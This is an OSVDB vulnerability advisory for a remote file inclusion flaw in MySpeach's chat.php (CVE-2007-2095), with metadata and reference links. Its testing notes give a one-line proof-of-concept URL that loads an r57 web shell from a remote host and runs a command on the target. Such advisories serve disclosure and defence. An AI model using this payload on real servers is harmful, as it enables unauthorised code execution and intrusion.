MySpeach chat.php my[root] Variable Remote File Inclusion

2007-04-14T18:09:18
ID OSVDB:35358
Type osvdb
Reporter OSVDB
Modified 2007-04-14T18:09:18

Description

Manual Testing Notes

/chat.php?my[root]=http://[target]/r57.txt?cm=id

References:

Vendor URL: http://www.easy-script.com/compt.php?id=1707 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0224.html CVE-2007-2095